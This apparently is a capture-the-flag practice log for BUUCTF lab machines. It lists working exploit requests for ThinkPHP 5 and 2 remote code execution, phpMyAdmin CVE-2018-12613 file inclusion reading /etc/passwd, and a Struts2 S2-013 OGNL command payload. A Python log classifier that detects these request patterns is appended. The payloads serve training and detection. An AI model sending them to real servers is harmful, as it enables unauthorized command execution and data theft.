  • BUU_Real practice log

    [ThinkPHP]5-Rce

    Remote command execution vulnerability in v5.0.23 and versions below v5.1.31

    http://node3.buuoj.cn:29858/index.php
    ?s=index/thinkapp/invokefunction
    &function=call_user_func_array
    &vars[0]=system
    &vars[1][]=whoami

     Get the flag

    http://node3.buuoj.cn:26215/index.php?s=index/thinkapp/invokefunction
    &function=call_user_func_array
    &vars[0]=phpinfo
    &vars[1][]=-1

    ThinkPHP5 RCE summary

    [ThinkPHP]5.0.23-Rce

    POST /index.php?s=captcha HTTP/1.1
    Host: node3.buuoj.cn:25184
    Content-Length: 76
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Origin: http://node3.buuoj.cn:25184
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://node3.buuoj.cn:25184/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=ls
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Connection: close
    
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=php -i&method=get

    [ThinkPHP]2-Rce

    http://node3.buuoj.cn:28705/index.php/Index/index/name/${@phpinfo()}
    
    http://node3.buuoj.cn:28705/index.php/Index/index/name/${@system(pwd)}

    ThinkPHP 2.1 vulnerability exploitation

    ThinkPHP vulnerability series: ThinkPHP 2.x arbitrary code execution

    [PHPMYADMIN]CVE-2018-12613

    http://node3.buuoj.cn:28623/index.php?target=sql.php%253F/../../../../../../etc/passwd

    In phpMyAdmin, run select “<?php phpinfo();?>”

    GET /index.php?target=tbl_sql.php%253F/../../../../../../../../../../../../../../tmp/sess_672a9aa66b158e4b49d9c1892d0a30c8 HTTP/1.1
    Host: node3.buuoj.cn:28623
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: pma_lang=zh_CN; phpMyAdmin=672a9aa66b158e4b49d9c1892d0a30c8; auto_saved_sql_sort=
    Connection: close

     phpMyAdmin 4.8.x LFI to RCE

    [struts2]s2-013

    http://node3.buuoj.cn:26757/link.action
    ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

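    Struts2 hit by another remote code execution vulnerability

    env: displays the environment variables that already exist on the system, and runs a command in a defined environment. Variable definitions: define variables in the new environment; separate multiple definitions with spaces. The format is "name=value".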
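
A defender's view of the requests recorded in the sections above, as an added example that is not part of the original write-up: a small Python classifier that flags each of those request shapes when run over proxy or access-log data. The rule names, the `values`/`classify`/`scan` helpers and the `app.example` sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

OGNL_MARKERS = ("#_memberAccess", "@java.lang.Runtime@")

def values(pairs, key):
    return [v for k, v in pairs if k == key]   # duplicates included

def classify(method, url, body=""):
    """Return the names of the rules one HTTP request matches."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)   # decoded once
    form = parse_qsl(body, keep_blank_values=True) if method == "POST" else []
    hits = []
    # ThinkPHP 5.x: s= routes to invokefunction, function= names the callback.
    if (any("invokefunction" in v.lower() for v in values(query, "s"))
            and "call_user_func_array" in values(query, "function")):
        hits.append("thinkphp5-invokefunction")
    # ThinkPHP 5.0.23: _method=__construct sent together with filter[] fields.
    if ("__construct" in values(form, "_method")
            and any(k.startswith("filter") for k, _ in form)):
        hits.append("thinkphp5-method-construct")
    # ThinkPHP 2.x: a ${...} expression inside the path segments.
    if "${" in unquote(parts.path):
        hits.append("thinkphp2-path-expression")
    # CVE-2018-12613: target= still carries an encoded '?' after one decode
    # (it was sent as %253F) and contains '..' segments.
    if any(re.search("%3f", v, re.I) and ".." in v for v in values(query, "target")):
        hits.append("phpmyadmin-target-double-encoding")
    # S2-013: OGNL markers inside any decoded query value.
    if any(m in v for _, v in query for m in OGNL_MARKERS):
        hits.append("struts2-ognl-parameter")
    return hits

# Constructed sample requests; host and parameter values are placeholders.
SAMPLES = [
    ("GET", "http://app.example/index.php?s=index/thinkapp/invokefunction"
            "&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1", ""),
    ("POST", "http://app.example/index.php?s=captcha",
             "_method=__construct&filter[]=phpinfo&method=get"),
    ("GET", "http://app.example/index.php/Index/index/name/${@phpinfo()}", ""),
    ("GET", "http://app.example/index.php?target=sql.php%253F/../../etc/passwd", ""),
    ("GET", "http://app.example/link.action?a=%24%7B%23_memberAccess%5B%22"
            "allowStaticMethodAccess%22%5D%3Dtrue%7D", ""),
    ("GET", "http://app.example/index.php?s=index/index/hello&target=sql.php", ""),
]

def scan(samples=SAMPLES):
    return [classify(m, u, b) for m, u, b in samples]
```

`scan()` returns one list of rule names per sample; the last sample is an ordinary request and comes back empty.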

    [struts2]s2-045

  • Original article: https://www.cnblogs.com/chrysanthemum/p/13681983.html